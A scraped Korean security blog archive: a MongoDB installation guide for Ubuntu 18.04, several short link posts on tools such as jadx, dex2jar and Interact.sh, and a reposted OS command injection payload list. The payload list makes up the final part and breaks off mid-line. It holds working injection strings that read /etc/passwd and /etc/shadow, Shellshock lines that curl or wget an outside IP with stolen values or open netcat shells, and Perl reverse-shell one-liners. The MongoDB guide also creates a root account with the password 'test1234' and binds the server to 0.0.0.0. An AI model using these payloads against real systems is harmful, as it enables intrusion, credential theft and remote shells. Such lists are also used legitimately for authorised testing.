[MongoDB] Ubuntu 18.04에 MongoDB 설치 건

카테고리 없음 2021. 12. 28. 16:53

https://here4you.tistory.com/272

 

[MongoDB] Ubuntu 18.04에 MongoDB 설치 방법

다음의 mongoDB 사이트 문서를 참고한다. docs.mongodb.com/manual/tutorial/install-mongodb-on-ubuntu/ Install MongoDB Community Edition on Ubuntu — MongoDB Manual docs.mongodb.com 1. MongoDB의 public..

here4you.tistory.com

 

다음의 mongoDB 사이트 문서를 참고한다.

 

docs.mongodb.com/manual/tutorial/install-mongodb-on-ubuntu/

 

Install MongoDB Community Edition on Ubuntu — MongoDB Manual

 

docs.mongodb.com

 

1. MongoDB의 public GPG key를 주입한다.

ubuntu@dev:~$ wget -qO - https://www.mongodb.org/static/pgp/server-4.4.asc | sudo apt-key add -
OK

 

2. MongoDB를 위한 리스트파일을 생성한다.

ubuntu@dev:~$ echo "deb [ arch=amd64,arm64 ] https://repo.mongodb.org/apt/ubuntu bionic/mongodb-org/4.4 multiverse"
| sudo tee /etc/apt/sources.list.d/mongodb-org-4.4.list
deb [ arch=amd64,arm64 ] https://repo.mongodb.org/apt/ubuntu bionic/mongodb-org/4.4 multiverse

 

3. 로컬 패키지 데이터베이스를 갱신한다.

ubuntu@dev:~$ sudo apt-get update
Hit:1 http://ap-northeast-2.ec2.archive.ubuntu.com/ubuntu bionic InRelease
Hit:2 http://ap-northeast-2.ec2.archive.ubuntu.com/ubuntu bionic-updates InRelease
Hit:3 http://ap-northeast-2.ec2.archive.ubuntu.com/ubuntu bionic-backports InRelease
Get:4 http://security.ubuntu.com/ubuntu bionic-security InRelease [88.7 kB]
Ign:5 https://repo.mongodb.org/apt/ubuntu bionic/mongodb-org/4.4 InRelease
Get:6 https://repo.mongodb.org/apt/ubuntu bionic/mongodb-org/4.4 Release [5391 B]
Get:7 https://repo.mongodb.org/apt/ubuntu bionic/mongodb-org/4.4 Release.gpg [801 B]
Get:8 https://repo.mongodb.org/apt/ubuntu bionic/mongodb-org/4.4/multiverse arm64 Packages [5112 B]
Get:9 https://repo.mongodb.org/apt/ubuntu bionic/mongodb-org/4.4/multiverse amd64 Packages [6838 B]
Fetched 107 kB in 2s (60.5 kB/s)
Reading package lists... Done
ubuntu@dev:~$

 

4. MongoDB를 설치한다.

ubuntu@dev:~$ sudo apt-get install -y mongodb-org

 

5. MoongoDB 서비스를 실행한다.

ubuntu@dev:~$ sudo service mongod start

 

6. MongoDB에 접속한다.

ubuntu@dev:~$ mongo
MongoDB shell version v4.4.2
connecting to: mongodb://127.0.0.1:27017/?compressors=disabled&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("98b58ce7-e220-46e1-9d66-c32ebbd7c30c") }
MongoDB server version: 4.4.2
Welcome to the MongoDB shell.
For interactive help, type "help".
For more comprehensive documentation, see
        https://docs.mongodb.com/
Questions? Try the MongoDB Developer Community Forums
        https://community.mongodb.com
---
The server generated these startup warnings when booting:
        2020-11-25T07:27:46.807+00:00: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine. See http://dochub.mongodb.org/core/prodnotes-filesystem
        2020-11-25T07:27:47.571+00:00: Access control is not enabled for the database. Read and write access to data and configuration is unrestricted
---
---
        Enable MongoDB's free cloud-based monitoring service, which will then receive and display
        metrics about your deployment (disk utilization, CPU, operation statistics, etc).

        The monitoring data will be available on a MongoDB website with a unique URL accessible to you
        and anyone you share the URL with. MongoDB may use this information to make product
        improvements and to suggest MongoDB products and deployment options to you.

        To enable free monitoring, run the following command: db.enableFreeMonitoring()
        To permanently disable this reminder, run the following command: db.disableFreeMonitoring()
---
> exit
bye
ubuntu@dev:~$

exit 명령어로 빠져나올 수 있다.

 

7. 관리자 계정 추가

MongoDB에 다시 접속하여 관리자 계정을 추가한다.

ubuntu@dev:~$ mongo
MongoDB shell version v4.4.2
connecting to: mongodb://127.0.0.1:27017/?compressors=disabled&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("d8bf7079-140f-4e9a-a774-cb5926cc08a5") }
MongoDB server version: 4.4.2
---
The server generated these startup warnings when booting:
        2020-11-25T07:27:46.807+00:00: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine. See http://dochub.mongodb.org/core/prodnotes-filesystem
        2020-11-25T07:27:47.571+00:00: Access control is not enabled for the database. Read and write access to data and configuration is unrestricted
---
---
        Enable MongoDB's free cloud-based monitoring service, which will then receive and display
        metrics about your deployment (disk utilization, CPU, operation statistics, etc).

        The monitoring data will be available on a MongoDB website with a unique URL accessible to you
        and anyone you share the URL with. MongoDB may use this information to make product
        improvements and to suggest MongoDB products and deployment options to you.

        To enable free monitoring, run the following command: db.enableFreeMonitoring()
        To permanently disable this reminder, run the following command: db.disableFreeMonitoring()
---
> use admin
switched to db admin
> db.createUser({user: 'test', pwd: 'test1234', roles: ['root']})
Successfully added user: { "user" : "test", "roles" : [ "root" ] }
> exit
bye
ubuntu@dev:~$

 

8. 인증 설정

MongoDB에 접속할 때 인증과정이 이루어지도록 설정파일을 수정한다.

우선 MongoDB를 종료한 후 수정을 한다.

ubuntu@dev:~$ sudo service mongod stop
ubuntu@dev:~$ sudo vim /etc/mongod.conf

 

mongod.conf 설정파일의 security 항목의 주석을 해제한 후 그 하단에 authorization: enabled 를 추가한다.

# mongod.conf

# for documentation of all options, see:
#   http://docs.mongodb.org/manual/reference/configuration-options/

# Where and how to store data.
storage:
  dbPath: /var/lib/mongodb
  journal:
    enabled: true
#  engine:
#  mmapv1:
#  wiredTiger:

# where to write logging data.
systemLog:
  destination: file
  logAppend: true
  path: /var/log/mongodb/mongod.log

# network interfaces
net:
  port: 27017
  bindIp: 127.0.0.1


# how the process runs
processManagement:
  timeZoneInfo: /usr/share/zoneinfo

security:
  authorization: enabled

#operationProfiling:

#replication:

#sharding:

## Enterprise-Only Options:

#auditLog:

#snmp:
~

 

9. 인증 접속

MongoDB를 다시 실행한 후 등록한 계정 정보로 접속을 시도해 보자.

ubuntu@dev:~$ sudo service mongod start
ubuntu@dev:~$ mongo admin -u test -p test1234
MongoDB shell version v4.4.2
connecting to: mongodb://127.0.0.1:27017/admin?compressors=disabled&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("5e6ae32d-901a-42b6-b1c6-2391482b2cec") }
MongoDB server version: 4.4.2
---
The server generated these startup warnings when booting:
        2020-11-25T07:38:12.870+00:00: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine. See http://dochub.mongodb.org/core/prodnotes-filesystem
---
---
        Enable MongoDB's free cloud-based monitoring service, which will then receive and display
        metrics about your deployment (disk utilization, CPU, operation statistics, etc).

        The monitoring data will be available on a MongoDB website with a unique URL accessible to you
        and anyone you share the URL with. MongoDB may use this information to make product
        improvements and to suggest MongoDB products and deployment options to you.

        To enable free monitoring, run the following command: db.enableFreeMonitoring()
        To permanently disable this reminder, run the following command: db.disableFreeMonitoring()
---
> exit
bye
ubuntu@dev:~$

 

10. 외부 접속 설정

MongoDB는 기본적으로 로컬호스트에서만 접속이 가능하도록 설정되어 있다. 외부 접속을 위해서는 net 항목의 bindIp 항목을 0.0.0.0으로 변경한다.

# mongod.conf

# for documentation of all options, see:
#   http://docs.mongodb.org/manual/reference/configuration-options/

# Where and how to store data.
storage:
  dbPath: /var/lib/mongodb
  journal:
    enabled: true
#  engine:
#  mmapv1:
#  wiredTiger:

# where to write logging data.
systemLog:
  destination: file
  logAppend: true
  path: /var/log/mongodb/mongod.log

# network interfaces
net:
  port: 27017
  bindIp: 0.0.0.0


# how the process runs
processManagement:
  timeZoneInfo: /usr/share/zoneinfo

security:
  authorization: enabled

#operationProfiling:

#replication:

#sharding:

## Enterprise-Only Options:

#auditLog:

#snmp:
~
~

추가로 사용할 Port를 변경하려면 port 항목도 변경한다.

 

11. 외부 접속 시도

외부에서 서버에 설치된 MongoDB로 접속하기 위해 GUI 툴을 이용해보자.

 

다음 링크에서 Robo3T를 다운로드 한다.

robomongo.org/download

 

Robomongo

Robo 3T: Simple GUI for beginners Robo 3T 1.4 brings support for MongoDB 4.2, a mongo shell upgrade from 4.0 to 4.2, the ability to manually specify visible databases, and many other fixes and improvements. View the full blog post.   Download Robo 3T  

robomongo.org

Robo3T를 설치한 후 실행한다.

 

연결 설정에서 서버의 주소와 포트번호를 입력한다.

 

 

인증 설정에서 생성했던 계정 정보를 입력한다.

설정을 저장하고 연결을 시도한다.

 

연결에 성공하면 다음과 같이 MongoDB의 내용을 확인할 수 있다.

 
블로그 이미지

wtdsoul

,

ckeditor release-notes

2021. 12. 27. 12:33

https://ckeditor.com/cke4/release-notes

 

Release notes

Security Updates: Fixed XSS vulnerability in the Clipboard plugin reported by Anton Subbotin. Issue summary: The vulnerability allowed to abuse paste functionality using malformed HTML, which could result in injecting arbitrary HTML into the editor. See

ckeditor.com

 

 

'' 카테고리의 다른 글

SSTF Github  (0) 2022.02.23
LDAP 인젝션  (0) 2022.01.20
websquare 이하 경로  (0) 2021.12.21
proxy tool  (0) 2021.11.17
apache tomcat tree  (0) 2021.11.08
블로그 이미지

wtdsoul

,

win10 jdk 설치

경로 및 정보 2021. 12. 23. 01:29

https://crazykim2.tistory.com/478

 

[JAVA] Window10의 JAVA SE 11 설치하기

안녕하세요 포스팅이 늦은 것 같지만 이번에 윈도우를 포맷하면서 자바를 다시 설치하게 되었습니다 자바 개발을 처음하거나 자바를 설치한지 오래되어서 기억이 안 나는 분들을 위해 자바 설

crazykim2.tistory.com

 

 

'경로 및 정보' 카테고리의 다른 글

노트패드 \r\n 개행  (0) 2022.01.17
nmap script nse 스캐닝  (0) 2021.12.29
Interact.sh 경로 건  (0) 2021.12.15
windows 10 텍스트 검색 경로  (0) 2021.12.11
window search 기능 활성화  (0) 2021.12.10
블로그 이미지

wtdsoul

,

websquare 이하 경로

2021. 12. 21. 14:23

 

websquare/fiddle/fiddle.html

'' 카테고리의 다른 글

LDAP 인젝션  (0) 2022.01.20
ckeditor release-notes  (0) 2021.12.27
proxy tool  (0) 2021.11.17
apache tomcat tree  (0) 2021.11.08
overflow error based 확인  (0) 2021.10.27
블로그 이미지

wtdsoul

,

Interact.sh 경로 건

경로 및 정보 2021. 12. 15. 17:14

https://www.hahwul.com/2021/10/05/support-interactsh-on-zap-oast/

 

이제 Interact.sh 가 ZAP OAST에서 지원됩니다

최근에 ZAP OAST(Callback 기능)에 projectdiscovery의 Interactsh 지원이 추가되었습니다. 약 2주전에 commit 됬고 저도 인지한지 좀 됬었는데, 이제서야 글로 작성하네요 😁 https://github.com/zaproxy/zap-extensions/com

www.hahwul.com

 

 

'경로 및 정보' 카테고리의 다른 글

nmap script nse 스캐닝  (0) 2021.12.29
win10 jdk 설치  (0) 2021.12.23
windows 10 텍스트 검색 경로  (0) 2021.12.11
window search 기능 활성화  (0) 2021.12.10
shodan 과 비슷한 서비스  (0) 2021.11.05
블로그 이미지

wtdsoul

,

windows 10 텍스트 검색 경로

경로 및 정보 2021. 12. 11. 01:04

https://positivemh.tistory.com/494

 

텍스트 검색 프로그램 findinfiles 사용법 폴더에서 특정 텍스트 들어간 소스파일 찾기

OS환경 : Windows 10 pro (64bit) 방법 : 텍스트 검색 프로그램 findinfiles 사용법 폴더에서 특정 텍스트 들어간 소스파일 찾기 업무를 하다보면 어떤 파일안에 들어있는 텍스트를 찾아야 할 일이 종종 생

positivemh.tistory.com

 

정상적으로 일단 접근이 안되네...

 

 

업무를 하다보면 어떤 파일안에 들어있는 텍스트를 찾아야 할 일이 종종 생긴다

html 업무 중 특정 클래스 명을 찾는다거나 개발업무 도중 특정 모듈 명을 찾는다거나 등등

그 때 사용하면 좋은 프로그램을 소개한다.

프로그램 이름은 findinfiles 이다

 

 

먼저 프로그램을 다운로드 한다

개발사 홈페이지에 접속

https://toolscode.com/findinfiles/

 

바로 다운로드 하고 싶다면 아래 파일을 설치하면 됨(공식 홈페이지에서 20200129에 다운로드 받은 파일)

findinfiles_win_x64_b272.exe

 

 

상단 Download 버튼 선택

 

 

다운로드를 GitHub에서 제공하고 있음 GitHub 선택

 

 

최신 빌드 다운로드

 

 

다운로드 받은 파일 실행

 

 

Next 선택

 

 

I Agree 선택

 

 

Next 선택

 

 

Install 선택

 

 

설치완료 Finish 선택

 

 

자동으로 프로그램이 실행되는데 일단 X 를 눌러 종료

 

 

소스를 찾으려는 폴더에 오른쪽 마우스를 눌린 뒤 FindInFiles... 선택

 

 

찾을 문자 입력(나의 경우 shutdown 을 입력) 후 찾을 파일 확장자명을 입력

 

 

찾기 버튼 선택 시 shutdown 이라는 단어가 포함된 파일들이 모두 나옴

 

 

'경로 및 정보' 카테고리의 다른 글

win10 jdk 설치  (0) 2021.12.23
Interact.sh 경로 건  (0) 2021.12.15
window search 기능 활성화  (0) 2021.12.10
shodan 과 비슷한 서비스  (0) 2021.11.05
PC용 Epub 뷰어  (0) 2021.10.26
블로그 이미지

wtdsoul

,

android jadx tool

모바일 2021. 12. 11. 00:25

https://dev-huhu.tistory.com/27

 

[Android] 안드로이드 APK 분석 툴(디컴파일) jadx

과거 APK 디컴파일을 위해 무슨 과정을 많이 거쳤는데 classes.dex 파일을 어떻게 jar로 변환하는지? 폴더 구조는 보이지만 파일의 코드를 전혀 볼 수 없었는지? 등의 문제를 거치다가 그 모든 과정을

dev-huhu.tistory.com

https://github.com/skylot/jadx/releases/tag/v1.3.0

 

Release 1.3.0 · skylot/jadx

Core Initial support for 'invoke-custom' instruction (#384) Initial support for java bytecode decompilation Concat constant strings (#1014) Rewrite try-catch processing Support AAR files as input ...

github.com

 

'모바일' 카테고리의 다른 글

[apk-mitm] APK 파일 SSL/TLS pinning 우회 및 기능 없애는 방법 (펌)  (0) 2022.04.28
libil2cpp-Patcher  (0) 2022.04.27
dex2jar 에러 경로 참고  (0) 2021.12.11
모바일 원격 디버깅 대응 소스 코드  (0) 2021.08.31
LLDB 디버깅 명령어 건  (0) 2021.08.31
블로그 이미지

wtdsoul

,

dex2jar 에러 경로 참고

모바일 2021. 12. 11. 00:02

https://blog.daum.net/gomahaera/23

 

[안드로이드] dex2jar : DexException not support version

proguard가 잘 적용이 되었는지 확인해보기 위해 디컴파일을 하려는데 dex파일을 jar 파일로 변환조차 안된다..ㅋ dex2jar 파일이 매년 업데이트가 되는게 아닌듯.. sourceforge에서 최신 업데이트가 16년

blog.daum.net

 

proguard가 잘 적용이 되었는지 확인해보기 위해 디컴파일을 하려는데 dex파일을 jar 파일로 변환조차 안된다..ㅋ

dex2jar 파일이 매년 업데이트가 되는게 아닌듯.. sourceforge에서 최신 업데이트가 16년에 이뤄졌...

 

암튼 이런 에러가 나면 classes.dex 파일을 열어서 한곳만 수정해주면 바로 jar 파일을 만들 수 있다!

hex editor를 먼저 다운로드 받아서 classes.dex 파일을 연다. (참고로 hex editor neo를 사용함)

www.hhdsoftware.com/free-hex-editor

 

Free Hex Editor: Fastest Binary File Editing Software. Freeware. Windows

I have been using Free Hex Editor Neo for years now for my hobby projects. Mostly in microcontroller debugging, where I was analyzing the buffer content or change endiannes of the data block. Lately I started with sd card driver for mcu and I had to analyz

www.hhdsoftware.com

열때, View-Offset-Decimal로 하고 보면 편하다... 한참 헤맴 ㅋ

 

파일을 열면 아래와 같이 나온다.

사진에서 초록색 칸으로 색칠되어 있는 이 부분! 여기 값이 35보다 크면 not support version 에러가 난다.. 싸발적..

그러니 이 값이 37 혹은 38인 경우 35로 고쳐서 저장해주자!

색칠되어 있는 칸이 안드로이드 버전을 나타냄

 

고치고 나면 저장해주고!

cmd 창 열어서 dex->jar 로 파일을 변환해주고! (cmd 명령어: d2j-dex2jar classes.dex)

jd-gui로 확인해보자~! 끝!

 

[참고 사이트]

www.programmersought.com/article/6193889467/

 

Dex2jar error com.googlecode.d2j.DexException: not support version - Programmer Sought

Reference link: https://www.jianshu.com/p/55bf5f688e9a https://source.android.com/devices/tech/dalvik/dex-format#dex-file-magic the reason: The version of dex2jar does not match the version of the dex file to be parsed. Program: Use the corresponding versi

www.programmersought.com

 

'모바일' 카테고리의 다른 글

libil2cpp-Patcher  (0) 2022.04.27
android jadx tool  (0) 2021.12.11
모바일 원격 디버깅 대응 소스 코드  (0) 2021.08.31
LLDB 디버깅 명령어 건  (0) 2021.08.31
딥링크란??  (0) 2021.08.03
블로그 이미지

wtdsoul

,

window search 기능 활성화

경로 및 정보 2021. 12. 10. 20:18

https://rgy0409.tistory.com/3309

 

윈도우10 검색안됨 (검색 기능 오류) 해결 방법

윈도우10의 편리한 기능 중 하나인 검색 기능이 때로 오작동 하는 경우가 있다고 합니다. 제 경우는 아직까지는 한번도 그런적이 없었지만, 저도 쓰다보면 언젠가 발생할 수 있는 일이기에 미리

rgy0409.tistory.com

 

 

 

'경로 및 정보' 카테고리의 다른 글

Interact.sh 경로 건  (0) 2021.12.15
windows 10 텍스트 검색 경로  (0) 2021.12.11
shodan 과 비슷한 서비스  (0) 2021.11.05
PC용 Epub 뷰어  (0) 2021.10.26
클라우드 AWS 모의해킹 방법론 (ex. 인포섹)  (0) 2021.08.31
블로그 이미지

wtdsoul

,

OS Command Injection Payload

카테고리 없음 2021. 11. 29. 13:16

https://github.com/payloadbox/command-injection-payload-list

 

GitHub - payloadbox/command-injection-payload-list: 🎯 Command Injection Payload List

🎯 Command Injection Payload List. Contribute to payloadbox/command-injection-payload-list development by creating an account on GitHub.

github.com

 

 

Remediation:

If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform additional commands than the one intended.

If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defense should be used to prevent attacks:

  • The user data should be strictly validated. Ideally, a whitelist of specific accepted values should be used. Otherwise, only short alphanumeric strings should be accepted. Input containing any other data, including any conceivable shell metacharacter or whitespace, should be rejected.
  • The application should use command APIs that launch a specific process via its name and command-line parameters, rather than passing a command string to a shell interpreter that supports command chaining and redirection. For example, the Java API Runtime.exec and the ASP.NET API Process.Start do not support shell metacharacters. This defense can mitigate

Unix :

<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
<!--#exec%20cmd="/usr/bin/id;-->
<!--#exec%20cmd="/usr/bin/id;-->
/index.html|id|
;id;
;id
;netstat -a;
;system('cat%20/etc/passwd')
;id;
|id
|/usr/bin/id
|id|
|/usr/bin/id|
||/usr/bin/id|
|id;
||/usr/bin/id;
;id|
;|/usr/bin/id|
\n/bin/ls -al\n
\n/usr/bin/id\n
\nid\n
\n/usr/bin/id;
\nid;
\n/usr/bin/id|
\nid|
;/usr/bin/id\n
;id\n
|usr/bin/id\n
|nid\n
`id`
`/usr/bin/id`
a);id
a;id
a);id;
a;id;
a);id|
a;id|
a)|id
a|id
a)|id;
a|id
|/bin/ls -al
a);/usr/bin/id
a;/usr/bin/id
a);/usr/bin/id;
a;/usr/bin/id;
a);/usr/bin/id|
a;/usr/bin/id|
a)|/usr/bin/id
a|/usr/bin/id
a)|/usr/bin/id;
a|/usr/bin/id
;system('cat%20/etc/passwd')
;system('id')
;system('/usr/bin/id')
%0Acat%20/etc/passwd
%0A/usr/bin/id
%0Aid
%0A/usr/bin/id%0A
%0Aid%0A
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
%0a ping -i 30 127.0.0.1 %0a
`ping 127.0.0.1`
| id
& id
; id
%0a id %0a
`id`
$;/usr/bin/id
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\`whoami\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=18?pwd=\`pwd\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\`uname -a\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=5"
() { :;}; /bin/bash -c "sleep 1 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=1&?vuln=6"
() { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1"
() { :;}; /bin/bash -c "sleep 3 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=3&?vuln=7"
() { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3"
() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=6&?vuln=8"
() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=9&?vuln=9"
() { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=17?user=\`whoami\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=19?pwd=\`pwd\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=23?uname=\`uname -a\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=4"
cat /etc/hosts
$(`cat /etc/passwd`)
cat /etc/passwd
%0Acat%20/etc/passwd
{{ get_user_file("/etc/passwd") }}
<!--#exec cmd="/bin/cat /etc/passwd"-->
<!--#exec cmd="/bin/cat /etc/shadow"-->
<!--#exec cmd="/usr/bin/id;-->
system('cat /etc/passwd');
<?php system("cat /etc/passwd");?>

Windows :

`
|| 
| 
; 
'
'"
"
"'
& 
&& 
%0a
%0a%0d

%0Aid
%0a id %0a
%0Aid%0A
%0a ping -i 30 127.0.0.1 %0a
%0A/usr/bin/id
%0A/usr/bin/id%0A
%2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1
%20{${phpinfo()}}
%20{${sleep(20)}}
%20{${sleep(3)}}
a|id|
a;id|
a;id;
a;id\n
() { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12
| curl http://crowdshield.com/.testing/rce.txt
& curl http://crowdshield.com/.testing/rce.txt
; curl https://crowdshield.com/.testing/rce_vuln.txt
&& curl https://crowdshield.com/.testing/rce_vuln.txt
curl https://crowdshield.com/.testing/rce_vuln.txt
 curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt
curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt
$(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)
dir
| dir
; dir
$(`dir`)
& dir
&&dir
&& dir
| dir C:\
; dir C:\
& dir C:\
&& dir C:\
dir C:\
| dir C:\Documents and Settings\*
; dir C:\Documents and Settings\*
& dir C:\Documents and Settings\*
&& dir C:\Documents and Settings\*
dir C:\Documents and Settings\*
| dir C:\Users
; dir C:\Users
& dir C:\Users
&& dir C:\Users
dir C:\Users
;echo%20'alert(1)' echo 'https://crowdshield.com/.testing/xss.js onload=prompt(2) onerror=alert(3)>'// XXXXXXXXXXX | echo "" > rfi.php ; echo "" > rfi.php & echo "" > rfi.php && echo "" > rfi.php echo "" > rfi.php | echo "" > dir.php ; echo "" > dir.php & echo "" > dir.php && echo "" > dir.php echo "" > dir.php | echo "" > cmd.php ; echo "" > cmd.php & echo "" > cmd.php && echo "" > cmd.php echo "" > cmd.php ;echo 'alert(1)' echo 'alert(1)'// XXXXXXXXXXX echo 'https://crowdshield.com/.testing/xss.js</a>>'// XXXXXXXXXXX | echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl ; echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl & echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl && echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl () { :;}; echo vulnerable 10 eval('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') eval('ls') eval('pwd') eval('pwd'); eval('sleep 5') eval('sleep 5'); eval('whoami') eval('whoami'); exec('echo 